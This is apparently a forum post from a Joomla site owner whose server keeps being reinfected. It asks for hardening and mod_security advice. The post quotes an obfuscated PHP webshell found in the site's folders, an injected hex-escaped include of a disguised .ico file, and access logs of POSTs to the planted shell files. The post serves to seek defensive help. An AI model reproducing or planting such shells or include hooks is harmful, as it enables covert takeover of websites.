The Perfect Server Debian Wheezy nginx installed 2015. One site Joomla host. There are files with different names in many folders. Directory Sample : /media/editors/codemirror/mode/erlang, /web/libraries, /web/media/editors/codemirror/, /web/media/editors/ vs vs File Sample : alias.php, BhvtQ.php, pathway.php.suspected content : Code: <?php $xWznxy4kH='nc4'^zCO;$ShX='@%NP , PQA '|'T*RR , PDH&';$LyfBidBY8=RK1^'{wq';$uXICEJPV='(c}'. 'G^'.rEyeebq&'7'.fcO_tdvfSle;$nylmlS4qXB='o~wuw}_g}nkv{oo'&'o~'.wuww_f.#BUtHXU'. '}~kw{on';$NafWJsYnULa="* -`"|'!!) ';$F6=')(A%`'|' $J ';$SF_P_4WIJ50=' !@e"36'. '"$%#5!1'|'30!%'.B50a172.' 4$';$olNB='h/g'^LNK;$eunzZ9='1r-'^'u*X';$MA=#t8vFBf'. '!+]T2"'^'V^+1]U';$qO9xfGzPx55=Z&I;$ETjZj="TW^_["&'W|q_e';$wjipDUO11BJ=O^#c5OW'. '+';$p9Rbd='E]O'^' %&';$EsUdkLfvOh=T|d;$dM3FkZQ3SJ1=T^'5';$yKozXkVe='"o>'^/*km'. 'eI~a*/GVf;$TX0=T|V;$eMbMRNA8P=ow&ob;$unNVS7w1=o&'~';$Vy7G2YjmG=$ShX^('8B(7NNH'. '$ H'|"0J #BY@ 0 H");$LpSuf6=$eunzZ9^$LyfBidBY8;$jvfK_n=$MA&('wmv}~v'&/*rkntw'. '0])Q*/"o}t}~~");$bXI0p=(m8O0.'`o5(GE8`'^'='.jkS7.'=Tx+$[D')|$uXICEJPV;'bR_s1l'. 'sBb';$g6JRSav0=('XX_&_]t+=M<%V!3'^'++:M#2+LJ#KP;N]')&$nylmlS4qXB;$GEiC=(#r8Ej'. ' @"D'|',@)A')|$NafWJsYnULa;$Q08GgwNAhrG=('7424y/.5:>sgy&'^'~IFE&'.wqFu.#fENPj'. '{<*7a')&(MTU____.'~Owo{Oo'&'~_w^'._y_WO.'{m{oo');$vKi8S=(' =x~&'^'dS:>W')|/*x'. '[Z@}WE*/$F6;!$Vy7G2YjmG($LpSuf6($jvfK_n($qO9xfGzPx55.$ETjZj)),$SF_P_4WIJ50./*'. 'EAVAac#+y*/$wjipDUO11BJ.('35 60!"41!'|'"$'.a68624.'(0').(' $"%'|'2DC0').(#Z7G'. '5er'&'}qf'))||$bXI0p($GEiC,$p9Rbd.$EsUdkLfvOh,$dM3FkZQ3SJ1);$g2ZSedZG0x=/*NJW'. 'M|kmd?b8F^*/$g6JRSav0($olNB.(' $@'|' b'),$jvfK_n($Q08GgwNAhrG));'adBcZtZd62j'. 'DBI';$g2ZSedZG0x($vKi8S,$yKozXkVe.$TX0.$eMbMRNA8P.$unNVS7w1);#@d[<s+aOP1JtUd'. '_Zjp&Rf3$l7{I~mw!t:yK(@1QQM4)Is4o;Tw7J~jFm45(89T0^^^uNv5^FbjIDmb'; Code: /*75636*/ @include "\x2fvar/\x77ww/k\x6fyunc\x75spor\x2enet/\x77eb/t\x65mpla\x74es/b\x65ez3/\x6aavas\x63ript\x2ffavi\x63on_c\x34bfe3\x2eico"; /*75636*/ There are different codes like this. Find and delete but 1-2 day after again file create spam. similar to open website daily changed address .....serverxx.loan............ http://competition6085.forward-a-server48.loan/?utm_medium=NQ3aDvyuBCtafRQJPeFC66tm+MNW8T+aflxP0d0AJGo=&t=main3 acces log sample Code: 5.9.31.30 - - [13/Feb/2018:08:50:32 +0100] "POST /pwswbj HTTP/1.1" 500 192 "http://koyuncuspor.net/pwswbj" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1" 5.9.31.30 - - [13/Feb/2018:08:50:33 +0100] "POST /ibnpa HTTP/1.1" 200 67 "http://koyuncuspor.net/ibnpa" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" 69.195.124.167 - - [13/Feb/2018:10:27:02 +0100] "POST /media/editors/codemirror/lib/iluhwhr/aayukgd.php HTTP/1.0" 500 192 "http://koyuncuspor.net/media/editors/codemirror/lib/iluhwhr/aayukgd.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 93.125.30.197 - - [13/Feb/2018:10:27:02 +0100] "POST /administrator/templates/system/html/alias.php HTTP/1.0" 200 53 "http://koyuncuspor.net/administrator/templates/system/html/alias.php" "Mozilla/5.0 (iPad; CPU OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1" 173.88.37.34 - - [13/Feb/2018:18:35:09 +0100] "@\x00\x00\x00B\xA3Z\xC0\xDB\xCEm~\xAC&\x1F\x9D2\x19k0\xDCT\x22\xE3\xDE\xDF\x1E\xDC\x93W(N\x82" 500 192 "-" "-" 5.9.41.3 - - [13/Feb/2018:21:47:57 +0100] "POST /ltqie HTTP/1.1" 500 594 "http://koyuncuspor.net/ltqie" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36" 195.74.38.179 - - [13/Feb/2018:22:35:27 +0100] "POST /components/com_contact/plugin12.php HTTP/1.0" 200 73 "http://koyuncuspor.net/components/com_contact/plugin12.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1" 193.178.229.150 - - [13/Feb/2018:22:35:31 +0100] "POST /administrator/templates/system/html/alias.php HTTP/1.0" 200 75 "http://koyuncuspor.net/administrator/templates/system/html/alias.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 74.220.219.72 - - [13/Feb/2018:22:35:36 +0100] "POST /plugins/system/t3/admin/layout/BhvtQ.php HTTP/1.0" 200 64 "http://koyuncuspor.net/plugins/system/t3/admin/layout/BhvtQ.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 198.71.228.42 - - [13/Feb/2018:22:35:42 +0100] "POST /media/editors/tinymce/plugins/image/xDpZWmJ.php HTTP/1.0" 200 56 "http://koyuncuspor.net/media/editors/tinymce/plugins/image/xDpZWmJ.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" 5.9.31.30 - - [13/Feb/2018:08:50:32 +0100] "POST /pwswbj HTTP/1.1" 500 192 "http://koyuncuspor.net/pwswbj" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1" 5.9.31.30 - - [13/Feb/2018:08:50:33 +0100] "POST /ibnpa HTTP/1.1" 200 67 "http://koyuncuspor.net/ibnpa" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" 69.195.124.167 - - [13/Feb/2018:10:27:02 +0100] "POST /media/editors/codemirror/lib/iluhwhr/aayukgd.php HTTP/1.0" 500 192 "http://koyuncuspor.net/media/editors/codemirror/lib/iluhwhr/aayukgd.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 93.125.30.197 - - [13/Feb/2018:10:27:02 +0100] "POST /administrator/templates/system/html/alias.php HTTP/1.0" 200 53 "http://koyuncuspor.net/administrator/templates/system/html/alias.php" "Mozilla/5.0 (iPad; CPU OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1" Server format and new installation but what kind of security measures should I take? https://www.howtoforge.com/tutorial/perfect-server-debian-jessie-nginx-bind-dovecot-ispconfig-3.1/ https://www.howtoforge.com/tutorial/perfect-server-ubuntu-with-nginx-and-ispconfig-3/ Which one would you recommend ? How can I enable mod_security for these installations.
